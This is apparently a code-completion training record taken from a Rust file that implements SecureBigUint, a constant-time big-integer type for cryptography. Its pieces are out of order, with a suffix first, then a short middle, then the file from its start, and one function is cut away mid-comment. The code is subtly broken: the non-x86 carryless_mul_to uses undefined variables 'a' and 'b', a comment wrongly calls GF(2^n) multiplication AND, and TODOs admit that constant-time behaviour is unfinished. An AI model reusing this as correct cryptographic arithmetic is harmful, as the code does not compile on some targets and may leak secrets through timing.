for v in self.value.iter_mut().rev() {
let (new_v, _) = v.overflowing_shr(1);
let new_carry = *v & 1;
*v = new_v | (carry << 31);
carry = new_carry;
}
}
/// Computes 'self >>= n'
/// NOTE: We assume that 'n' is a publicly known constant.
pub fn shr_n(&mut self, n: usize) {
let byte_shift = n / BASE_BITS;
let carry_size = n % BASE_BITS;
let carry_mask = ((1 as BaseType) << carry_size).wrapping_sub(1);
for i in 0..self.value.len() {
let v = self.value[i];
self.value[i] = 0;
if i < byte_shift {
continue;
}
let j = i - byte_shift;
self.value[j] = v >> carry_size;
if carry_size != 0 && j > 0 {
let carry = v & carry_mask;
self.value[j - 1] |= carry << (BASE_BITS - carry_size);
}
}
}
/// Computes self >>= BASE_BITS.
pub(super) fn shr_base(&mut self) {
assert_eq!(self.value[0], 0);
for j in 1..self.value.len() {
self.value[j - 1] = self.value[j];
}
let k = self.value.len();
self.value[k - 1] = 0;
}
pub fn and_assign(&mut self, rhs: &Self) {
for i in 0..self.value.len() {
self.value[i] &= rhs.value[i];
}
}
/// Efficienctly (in O(1) time) computes 'self % 2^32'
pub fn mod_word(&self) -> u32 {
if self.value.len() == 0 {
0
} else {
self.value[0]
}
}
// TODO: Need a version of this using pmull in aarch64 (vmull_p64)
/// Interprates this integer and 'rhs' as polynomials over GF(2^n) and
/// multiplies them into 'out'.
///
/// Operations in this field:
/// - Addition is XOR
/// - Multiplication is AND
#[cfg(all(target_arch = "x86_64", target_feature = "pclmulqdq"))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
use crate::intrinsics::*;
use core::arch::x86_64::_mm_clmulepi64_si128;
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..self.value.len() {
let a = u64_to_m128i(self.value[i] as u64);
for j in 0..rhs.value.len() {
let b = u64_to_m128i(rhs.value[j] as u64);
let r = u64_from_m128i(unsafe { _mm_clmulepi64_si128(a, b, 0) });
let rl = r as u32;
let rh = (r >> 32) as u32;
// Add to output
out.value[i + j] ^= rl;
out.value[i + j + 1] ^= rh;
}
}
}
// TODO: Finish making this constant time and correct.
#[cfg(not(all(target_arch = "x86_64", target_feature = "pclmulqdq")))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..b.value_bits() {
out.xor_assign_if(b.bit(i) == 1, &a);
a.shl();
}
}
// TODO: Move to a shared utility.
pub fn to_string_radix(&self, radix: u32) -> alloc::string::String {
// TODO: These should be global constants (as well as one)
let zero = Self::from_usize(0, self.bit_width());
let div = Self::from_usize(radix as usize, 32);
let mut s = alloc::string::String::new();
let mut tmp = self.clone();
while tmp > zero {
// TODO: We can divide by a larger power of 10 to make this more efficient.
let (q, r) = tmp.quorem(&div);
tmp = q;
// TODO: Very inefficient
s.insert(
0,
core::char::from_digit(r.value.first().cloned().unwrap_or(0), radix).unwrap(),
);
}
if s.len() == 0 {
s.push('0');
}
s
}
/// Resets the value of the integer to 0.
pub fn assign_zero(&mut self) |
/// In-place increases the size
pub fn extend(&mut self, bit_width: usize) {
let new_len = ceil_div(bit_width, BASE_BITS);
assert!(new_len >= self.value.len());
self.value.resize(new_len, 0);
}
pub fn from_str(s: &str, bit_width: usize) -> common::errors::Result<Self> {
let ten = SecureBigUint::from_usize(10, 32);
let mut out = Self::from_usize(0, bit_width);
for c in s.chars() {
let digit = c
.to_digit(10)
.ok_or(common::errors::err_msg("Invalid digit"))?;
let tmp = out.clone();
ten.mul_to(&tmp, &mut out);
out += SecureBigUint::from_usize(digit as usize, bit_width);
// out = (&out * &ten) + &(digit as usize).into();
}
Ok(out)
}
}
impl core::fmt::Display for SecureBigUint {
fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result {
write!(f, "{}", self.to_string_radix(10))
}
}
impl Ord for SecureBigUint {
fn cmp(&self, other: &Self) -> Ordering {
let mut less = 0;
let mut greater = 0;
let n = core::cmp::max(self.value.len(), other.value.len());
for i in (0..n).rev() {
let mask = !(less | greater);
let a = self.value.get(i).cloned().unwrap_or(0);
let b = other.value.get(i).cloned().unwrap_or(0);
if a < b {
less |= mask & 1;
} else if a > b {
greater |= mask & 1;
}
}
let cmp = (less << 1) | greater;
let mut out = Ordering::Equal;
// Exactly one of these if statements should always be triggered.
if cmp == 0b10 {
out = Ordering::Less;
}
if cmp == 0b01 {
out = Ordering::Greater;
}
if cmp == 0b00 {
out = Ordering::Equal;
}
out
}
}
impl PartialEq for SecureBigUint {
fn eq(&self, other: &Self) -> bool {
self.cmp(other) == Ordering::Equal
}
}
impl Eq for SecureBigUint {}
impl PartialOrd for SecureBigUint {
fn partial_cmp(&self, other: &Self) -> Option<Ordering> {
Some(self.cmp(other))
}
}
impl_op_ex!(+= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::add_assign(lhs, rhs)
});
impl_op_commutative!(+ |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
// NOTE: Does not use add_into to avoid risking an overflow.
Integer::add(&lhs, rhs)
});
impl_op!(+ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
Integer::add(lhs, rhs)
});
impl_op_ex!(-= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::sub_assign(lhs, rhs)
});
impl_op_ex!(-|lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { lhs.sub_into(rhs) });
impl_op!(-|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::sub(lhs, rhs) });
impl_op_ex!(
*|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::mul(lhs, rhs) }
);
impl_op_ex!(/ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (q, _) = lhs.quorem(rhs);
q
});
impl_op!(% |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op!(% |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op_ex!(^= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
assert_eq!(lhs.value.len(), rhs.value.len());
for (lhs_value, rhs_value) in lhs.value.iter_mut().zip(rhs.value.iter()) {
*lhs_value ^= *rhs_value;
}
});
impl_op_ex!(^ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
assert_eq!(lhs.value.len(), rhs.value.len());
let mut out = SecureBigUint::from_usize(0, lhs.bit_width());
for i in 0..out.value.len() {
out.value[i] = lhs.value[i] ^ rhs.value[i];
}
out
});
#[cfg(test)]
mod tests {
use super::*;
use core::str::FromStr;
#[test]
fn secure_biguint_test() {
// TODO: Check multiplication in x*0 and x*1 cases
let seven = SecureBigUint::from_usize(7, 64);
let one_hundred = SecureBigUint::from_usize(100, 64);
assert!(one_hundred > seven);
assert!(seven < one_hundred);
assert!(one_hundred == one_hundred);
assert!(seven == seven);
let mut seven_hundred = SecureBigUint::from_usize(0, 64);
seven.mul_to(&one_hundred, &mut seven_hundred);
assert!(seven_hundred == SecureBigUint::from_usize(700, 64));
let x = SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff]);
let mut temp = SecureBigUint::from_usize(0, 64);
x.mul_to(&x, &mut temp);
assert_eq!(
&temp.to_le_bytes(),
&(core::u32::MAX as u64).pow(2).to_le_bytes()
);
let (q, r) = temp.quorem(&x);
// Equal to 'x' extended to 64 bits
assert!(q == SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0]));
assert!(r == SecureBigUint::from_usize(0, 32));
let (q, r) = one_hundred.quorem(&seven);
assert!(q == SecureBigUint::from_usize(14, 64));
assert!(r == SecureBigUint::from_usize(2, 64));
let (q, r) = seven.quorem(&one_hundred);
assert!(q == SecureBigUint::from_usize(0, 64));
assert!(r == SecureBigUint::from_usize(7, 64));
// TODO: Test larger numbers.
}
#[test]
fn shr_n_test() {
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0b00001010, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(8);
assert_eq!(&v.to_be_bytes(), &[0, 0b00010100, 0, 0]);
}
// Testing moving values across bases.
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(32);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00010100, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(34);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00000101, 0, 0, 0]);
}
// Carry to second base.
{
let mut v = SecureBigUint::from_be_bytes(&[0, 0, 0, 1, 0, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b10000000, 0, 0, 0]);
}
}
}
| {
for v in self.value.iter_mut() {
*v = 0;
}
} | identifier_body |
uint.rs | use alloc::vec::Vec;
use common::ceil_div;
use core::cmp::Ord;
use core::cmp::Ordering;
use core::marker::PhantomData;
use core::ops;
use core::ops::Div;
use core::ops::Index;
use core::ops::IndexMut;
use generic_array::{arr::AddLength, ArrayLength, GenericArray};
use typenum::Quot;
use typenum::{Prod, U32};
use crate::integer::Integer;
use crate::matrix::dimension::*;
use crate::number::{One, Zero};
/*
pub trait StorageType<D: Dimension>:
Clone + AsRef<[u32]> + AsMut<[u32]> + Index<usize, Output = u32> + IndexMut<usize, Output = u32>
{
/// Allocates a new buffer with at least 'words' number of items.
fn alloc(words: usize) -> Self;
}
impl StorageType<Dynamic> for Vec<u32> {
fn alloc(words: usize) -> Self {
vec![0; words]
}
}
*/
pub(super) type BaseType = u32;
pub(super) const BASE_BITS: usize = 32;
const BASE_BYTES: usize = core::mem::size_of::<BaseType>();
const BITS_PER_BYTE: usize = 8;
/// Big unsigned integer implementation intended for security critical
/// use-cases.
///
/// Internally each instance stores a fixed size storage buffer based on the bit
/// width used to initialize the integer. All numerical operations are constant
/// time for a given storage buffer size unless otherwise specified. This means
/// that we assume that the buffer widths are publicly known and don't vary with
/// the value of the integer.
///
/// Special care must be taken to ensure that the width of integers generated by
/// operations is kept under control:
/// - Addition (a + b) will output integers with space for one extra carry bit.
/// - Multiplication (a*b) will output integers with double the space.
/// - Operations like quorem (a % b) or truncate can be used to re-contrain the
/// width of integers.
#[derive(Clone, Debug)]
pub struct SecureBigUint {
/// In little endian 32bits at a time.
/// Will be padded with
///
/// TODO: We can make this an enum to support passing in '&mut [BaseType]'
pub(super) value: Vec<BaseType>,
}
impl SecureBigUint {
/// Creates an integer from a small value that fits within a usize. The
/// buffer used to store this number will be able to store at least 'width'
/// bits.
pub fn from_usize(value: usize, width: usize) -> Self {
let mut data = vec![0; ceil_div(width, BASE_BITS)];
data[0] = value as BaseType;
Self { value: data }
}
}
impl Integer for SecureBigUint {
/// Creates an integer from little endian bytes representing the number.
///
/// The width of the integer is inferred from data.len().
/// The caller is responsible for ensuring that data.len() is a well known
/// constant.
fn from_le_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_le_bytes(*array_ref![data, BASE_BYTES * i, BASE_BYTES]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[0..rem].copy_from_slice(&data[(data.len() - rem)..]);
out.value[n] = BaseType::from_le_bytes(rest);
}
out
}
/// Converts the integer to little endian bytes.
///
/// NOTE: This may have zero significant padding depending on the internal
/// representation.
fn to_le_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * BASE_BYTES);
for v in &self.value {
data.extend_from_slice(&v.to_le_bytes());
}
data
}
fn from_be_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_be_bytes(*array_ref![
data,
data.len() - (BASE_BYTES * (i + 1)),
BASE_BYTES
]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[(BASE_BYTES - rem)..].copy_from_slice(&data[0..rem]);
out.value[n] = BaseType::from_be_bytes(rest);
}
out
}
fn to_be_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * 4);
for v in self.value.iter().rev() {
data.extend_from_slice(&v.to_be_bytes());
}
data
}
/// Computes and returns 'self + rhs'. The output buffer will be 1 bit
/// larger than the inputs to accomadate possible overflow.
fn add(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, core::cmp::max(self.bit_width(), rhs.bit_width()) + 1);
self.add_to(rhs, &mut out);
out
}
/// Computes 'output = self + rhs'. It is the user's responsibility to
/// ensure that the
fn add_to(&self, rhs: &Self, output: &mut Self) {
assert!(output.value.len() >= self.value.len());
assert!(output.value.len() >= rhs.value.len());
let mut carry = 0;
// TODO: Always loop through max(self, rhs, output) length so we know for sure
// that all carries are handled.
let n = output.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
let v = (a as u64) + (b as u64) + carry;
output.value[i] = v as BaseType;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
/// Computes 'self += rhs'.
fn add_assign(&mut self, rhs: &Self) {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
let v = (self.value[i] as u64) + (rhs.value[i] as u64) + carry;
self.value[i] = v as u32;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
fn sub(&self, rhs: &Self) -> Self {
let mut out = self.clone();
out.sub_assign(rhs);
out
}
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
fn sub_assign(&mut self, rhs: &Self) {
assert!(!self.overflowing_sub_assign(rhs));
}
fn mul(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, self.bit_width() + rhs.bit_width());
self.mul_to(rhs, &mut out);
out
}
/// O(n^2) multiplication. Assumes that u64*u64 multiplication is always
/// constant time.
///
/// 'out' must be twice the size of
fn mul_to(&self, rhs: &Self, out: &mut Self) {
out.assign_zero();
let mut overflowed = false;
for i in 0..self.value.len() {
let mut carry = 0;
for j in 0..rhs.value.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((self.value[i] as u64) * (rhs.value[j] as u64))
+ (out.value[i + j] as u64)
+ carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as BaseType;
}
// assert!(carry <= u32::max_value() as u64);
if i + rhs.value.len() < out.value.len() {
out.value[i + rhs.value.len()] = carry as BaseType;
} else {
overflowed |= carry != 0;
}
}
assert!(!overflowed);
}
fn bit(&self, i: usize) -> usize {
((self.value[i / BASE_BITS] >> (i % BASE_BITS)) & 0b01) as usize
}
fn set_bit(&mut self, i: usize, v: usize) {
assert!(v == 0 || v == 1);
let ii = i / BASE_BITS;
let shift = i % BASE_BITS;
let mask = !(1 << shift);
self.value[ii] = (self.value[ii] & mask) | ((v as BaseType) << shift);
}
/// Computes the quotient and remainder of 'self / rhs'.
///
/// Any mixture of input bit_widths is supported.
/// Internally this uses binary long division.
///
/// NOTE: This is very slow and should be avoided if possible.
///
/// Returns a tuple of '(self / rhs, self % rhs)' where the quotient is the
/// same width as 'self' and the remainder is the same width as 'rhs'.
fn quorem(&self, rhs: &Self) -> (Self, Self) {
let mut q = Self::from_usize(0, self.bit_width()); // Range is [0, Self]
let mut r = Self::from_usize(0, rhs.bit_width()); // Range is [0, rhs).
// TODO: Implement a bit iterator so set_bit requires less work.
for i in (0..self.bit_width()).rev() {
let carry = r.shl();
r.set_bit(0, self.bit(i));
let mut next_r = Self::from_usize(0, rhs.bit_width());
// If there is a carry, then we know that r might be > rhs when the shl also has
// a carry.
let carry2 = r.overflowing_sub_to(rhs, &mut next_r);
let subtract = (carry != 0) == carry2;
next_r.copy_if(subtract, &mut r);
q.set_bit(i, if subtract { 1 } else { 0 });
}
(q, r)
}
fn value_bits(&self) -> usize {
for i in (0..self.value.len()).rev() {
let zeros = self.value[i].leading_zeros() as usize;
if zeros == BASE_BITS {
continue;
}
return (i * BASE_BITS) + (BASE_BITS - zeros);
}
0
}
fn bit_width(&self) -> usize {
self.value.len() * BASE_BITS
}
}
impl SecureBigUint {
pub fn byte_width(&self) -> usize {
self.value.len() * BASE_BYTES
}
/// Multiplies two numbers and adds their result to the out number.
/// out += self*rhs
pub(super) fn add_mul_to(&self, rhs: &Self, out: &mut Self) {
let a = &self.value[..];
let b = &rhs.value[..];
for i in 0..a.len() {
let mut carry = 0;
for j in 0..b.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((a[i] as u64) * (b[j] as u64)) + (out.value[i + j] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as u32;
}
for k in (i + b.len())..out.value.len() {
let tmp = (out.value[k] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[k] = tmp as u32;
}
}
}
/// Copies 'self' to 'out' if should_copy is true. In all cases, this takes
/// a constant amount of time to execute.
///
/// NOTE: 'self' and 'out' must have the same bit_width().
#[inline(never)]
pub fn copy_if(&self, should_copy: bool, out: &mut Self) {
assert_eq!(self.value.len(), out.value.len());
// Will be 0b111...111 if should_copy else 0.
let self_mask = (!(should_copy as BaseType)).wrapping_add(1);
let out_mask = !self_mask;
for (self_v, out_v) in self.value.iter().zip(out.value.iter_mut()) {
*out_v = (*self_v & self_mask).wrapping_add(*out_v & out_mask);
}
}
/// Swaps the contents of 'self' and 'other' if 'should_swap' is true.
///
/// The actual values of both integers are swapped rather than swapping any
/// internal memory pointers so that 'should_swap' can not be inferred from
/// the memory locations of the final integers.
///
/// At a given integer bit_width, this should always take the same amount of
/// CPU cycles to execute.
#[inline(never)]
pub fn swap_if(&mut self, other: &mut Self, should_swap: bool) {
assert_eq!(self.value.len(), other.value.len());
// Will be 0b111...111 if should_swap else 0.
let mask = (!(should_swap as BaseType)).wrapping_add(1);
for (self_v, other_v) in self.value.iter_mut().zip(other.value.iter_mut()) {
// Will be 0 if we don't want to swap.
let filter = mask & (*self_v ^ *other_v);
*self_v ^= filter;
*other_v ^= filter;
}
}
/// In-place reverses all the order of all bits in this integer.
pub fn reverse_bits(&mut self) {
let mid = (self.value.len() + 1) / 2;
for i in 0..mid {
let j = self.value.len() - 1 - i;
// Swap if we are not at the middle limb (only relevant if we have an odd number
// of limbs).
if i != j {
self.value.swap(i, j);
self.value[j] = self.value[j].reverse_bits();
}
self.value[i] = self.value[i].reverse_bits();
}
}
/// Performs 'self ^= rhs' only if 'should_apply' is true.
pub fn xor_assign_if(&mut self, should_apply: bool, rhs: &Self) {
assert_eq!(self.value.len(), rhs.value.len());
// Will be 0b111...111 if should_apply else 0.
let mask = (!(should_apply as BaseType)).wrapping_add(1);
for i in 0..self.value.len() {
self.value[i] ^= rhs.value[i] & mask;
}
}
pub fn discard(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
self.value.truncate(n);
}
///
pub fn truncate(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
// TODO: Also zero out any high bits
for i in n..self.value.len() {
assert_eq!(self.value[i], 0);
}
self.value.truncate(n);
}
/// Computes 2^n more efficiently than using pow().
/// Only supports exponents smaller than u32.
/// TODO: Just take as input a u32 directly.
pub fn exp2(n: u32, bit_width: usize) -> Self {
let mut out = Self::from_usize(0, bit_width);
out.set_bit(n as usize, 1);
out
}
pub fn is_zero(&self) -> bool {
let mut is = true;
for v in &self.value {
is &= *v == 0;
}
is
}
/// TODO: Improve the constant time behavior of this.
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
pub(super) fn overflowing_sub_assign(&mut self, rhs: &Self) -> bool {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
// rhs is allowed to be narrower than self
let r_i = if i < rhs.value.len() { rhs.value[i] } else { 0 };
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (self.value[i] as i64) - (r_i as i64) + carry;
if v < 0 {
self.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
self.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
pub(super) fn overflowing_sub_to(&self, rhs: &Self, out: &mut Self) -> bool {
let mut carry = 0;
let n = out.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (a as i64) - (b as i64) + carry;
if v < 0 {
out.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
out.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
/// Performs modular reduction using up to one subtraction of the modulus
/// from the value. | reduced.copy_if(!overflow, self);
self.truncate(modulus.bit_width());
}
#[must_use]
pub fn shl(&mut self) -> BaseType {
let mut carry = 0;
for v in self.value.iter_mut() {
let (new_v, _) = v.overflowing_shl(1);
let new_carry = *v >> 31;
*v = new_v | carry;
carry = new_carry;
}
carry
}
pub fn shr(&mut self) {
let mut carry = 0;
for v in self.value.iter_mut().rev() {
let (new_v, _) = v.overflowing_shr(1);
let new_carry = *v & 1;
*v = new_v | (carry << 31);
carry = new_carry;
}
}
/// Computes 'self >>= n'
/// NOTE: We assume that 'n' is a publicly known constant.
pub fn shr_n(&mut self, n: usize) {
let byte_shift = n / BASE_BITS;
let carry_size = n % BASE_BITS;
let carry_mask = ((1 as BaseType) << carry_size).wrapping_sub(1);
for i in 0..self.value.len() {
let v = self.value[i];
self.value[i] = 0;
if i < byte_shift {
continue;
}
let j = i - byte_shift;
self.value[j] = v >> carry_size;
if carry_size != 0 && j > 0 {
let carry = v & carry_mask;
self.value[j - 1] |= carry << (BASE_BITS - carry_size);
}
}
}
/// Computes self >>= BASE_BITS.
pub(super) fn shr_base(&mut self) {
assert_eq!(self.value[0], 0);
for j in 1..self.value.len() {
self.value[j - 1] = self.value[j];
}
let k = self.value.len();
self.value[k - 1] = 0;
}
pub fn and_assign(&mut self, rhs: &Self) {
for i in 0..self.value.len() {
self.value[i] &= rhs.value[i];
}
}
/// Efficienctly (in O(1) time) computes 'self % 2^32'
pub fn mod_word(&self) -> u32 {
if self.value.len() == 0 {
0
} else {
self.value[0]
}
}
// TODO: Need a version of this using pmull in aarch64 (vmull_p64)
/// Interprates this integer and 'rhs' as polynomials over GF(2^n) and
/// multiplies them into 'out'.
///
/// Operations in this field:
/// - Addition is XOR
/// - Multiplication is AND
#[cfg(all(target_arch = "x86_64", target_feature = "pclmulqdq"))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
use crate::intrinsics::*;
use core::arch::x86_64::_mm_clmulepi64_si128;
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..self.value.len() {
let a = u64_to_m128i(self.value[i] as u64);
for j in 0..rhs.value.len() {
let b = u64_to_m128i(rhs.value[j] as u64);
let r = u64_from_m128i(unsafe { _mm_clmulepi64_si128(a, b, 0) });
let rl = r as u32;
let rh = (r >> 32) as u32;
// Add to output
out.value[i + j] ^= rl;
out.value[i + j + 1] ^= rh;
}
}
}
// TODO: Finish making this constant time and correct.
#[cfg(not(all(target_arch = "x86_64", target_feature = "pclmulqdq")))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..b.value_bits() {
out.xor_assign_if(b.bit(i) == 1, &a);
a.shl();
}
}
// TODO: Move to a shared utility.
pub fn to_string_radix(&self, radix: u32) -> alloc::string::String {
// TODO: These should be global constants (as well as one)
let zero = Self::from_usize(0, self.bit_width());
let div = Self::from_usize(radix as usize, 32);
let mut s = alloc::string::String::new();
let mut tmp = self.clone();
while tmp > zero {
// TODO: We can divide by a larger power of 10 to make this more efficient.
let (q, r) = tmp.quorem(&div);
tmp = q;
// TODO: Very inefficient
s.insert(
0,
core::char::from_digit(r.value.first().cloned().unwrap_or(0), radix).unwrap(),
);
}
if s.len() == 0 {
s.push('0');
}
s
}
/// Resets the value of the integer to 0.
pub fn assign_zero(&mut self) {
for v in self.value.iter_mut() {
*v = 0;
}
}
/// In-place increases the size
pub fn extend(&mut self, bit_width: usize) {
let new_len = ceil_div(bit_width, BASE_BITS);
assert!(new_len >= self.value.len());
self.value.resize(new_len, 0);
}
pub fn from_str(s: &str, bit_width: usize) -> common::errors::Result<Self> {
let ten = SecureBigUint::from_usize(10, 32);
let mut out = Self::from_usize(0, bit_width);
for c in s.chars() {
let digit = c
.to_digit(10)
.ok_or(common::errors::err_msg("Invalid digit"))?;
let tmp = out.clone();
ten.mul_to(&tmp, &mut out);
out += SecureBigUint::from_usize(digit as usize, bit_width);
// out = (&out * &ten) + &(digit as usize).into();
}
Ok(out)
}
}
impl core::fmt::Display for SecureBigUint {
fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result {
write!(f, "{}", self.to_string_radix(10))
}
}
impl Ord for SecureBigUint {
fn cmp(&self, other: &Self) -> Ordering {
let mut less = 0;
let mut greater = 0;
let n = core::cmp::max(self.value.len(), other.value.len());
for i in (0..n).rev() {
let mask = !(less | greater);
let a = self.value.get(i).cloned().unwrap_or(0);
let b = other.value.get(i).cloned().unwrap_or(0);
if a < b {
less |= mask & 1;
} else if a > b {
greater |= mask & 1;
}
}
let cmp = (less << 1) | greater;
let mut out = Ordering::Equal;
// Exactly one of these if statements should always be triggered.
if cmp == 0b10 {
out = Ordering::Less;
}
if cmp == 0b01 {
out = Ordering::Greater;
}
if cmp == 0b00 {
out = Ordering::Equal;
}
out
}
}
impl PartialEq for SecureBigUint {
fn eq(&self, other: &Self) -> bool {
self.cmp(other) == Ordering::Equal
}
}
impl Eq for SecureBigUint {}
impl PartialOrd for SecureBigUint {
fn partial_cmp(&self, other: &Self) -> Option<Ordering> {
Some(self.cmp(other))
}
}
impl_op_ex!(+= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::add_assign(lhs, rhs)
});
impl_op_commutative!(+ |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
// NOTE: Does not use add_into to avoid risking an overflow.
Integer::add(&lhs, rhs)
});
impl_op!(+ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
Integer::add(lhs, rhs)
});
impl_op_ex!(-= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::sub_assign(lhs, rhs)
});
impl_op_ex!(-|lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { lhs.sub_into(rhs) });
impl_op!(-|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::sub(lhs, rhs) });
impl_op_ex!(
*|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::mul(lhs, rhs) }
);
impl_op_ex!(/ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (q, _) = lhs.quorem(rhs);
q
});
impl_op!(% |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op!(% |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op_ex!(^= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
assert_eq!(lhs.value.len(), rhs.value.len());
for (lhs_value, rhs_value) in lhs.value.iter_mut().zip(rhs.value.iter()) {
*lhs_value ^= *rhs_value;
}
});
impl_op_ex!(^ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
assert_eq!(lhs.value.len(), rhs.value.len());
let mut out = SecureBigUint::from_usize(0, lhs.bit_width());
for i in 0..out.value.len() {
out.value[i] = lhs.value[i] ^ rhs.value[i];
}
out
});
#[cfg(test)]
mod tests {
use super::*;
use core::str::FromStr;
#[test]
fn secure_biguint_test() {
// TODO: Check multiplication in x*0 and x*1 cases
let seven = SecureBigUint::from_usize(7, 64);
let one_hundred = SecureBigUint::from_usize(100, 64);
assert!(one_hundred > seven);
assert!(seven < one_hundred);
assert!(one_hundred == one_hundred);
assert!(seven == seven);
let mut seven_hundred = SecureBigUint::from_usize(0, 64);
seven.mul_to(&one_hundred, &mut seven_hundred);
assert!(seven_hundred == SecureBigUint::from_usize(700, 64));
let x = SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff]);
let mut temp = SecureBigUint::from_usize(0, 64);
x.mul_to(&x, &mut temp);
assert_eq!(
&temp.to_le_bytes(),
&(core::u32::MAX as u64).pow(2).to_le_bytes()
);
let (q, r) = temp.quorem(&x);
// Equal to 'x' extended to 64 bits
assert!(q == SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0]));
assert!(r == SecureBigUint::from_usize(0, 32));
let (q, r) = one_hundred.quorem(&seven);
assert!(q == SecureBigUint::from_usize(14, 64));
assert!(r == SecureBigUint::from_usize(2, 64));
let (q, r) = seven.quorem(&one_hundred);
assert!(q == SecureBigUint::from_usize(0, 64));
assert!(r == SecureBigUint::from_usize(7, 64));
// TODO: Test larger numbers.
}
#[test]
fn shr_n_test() {
{
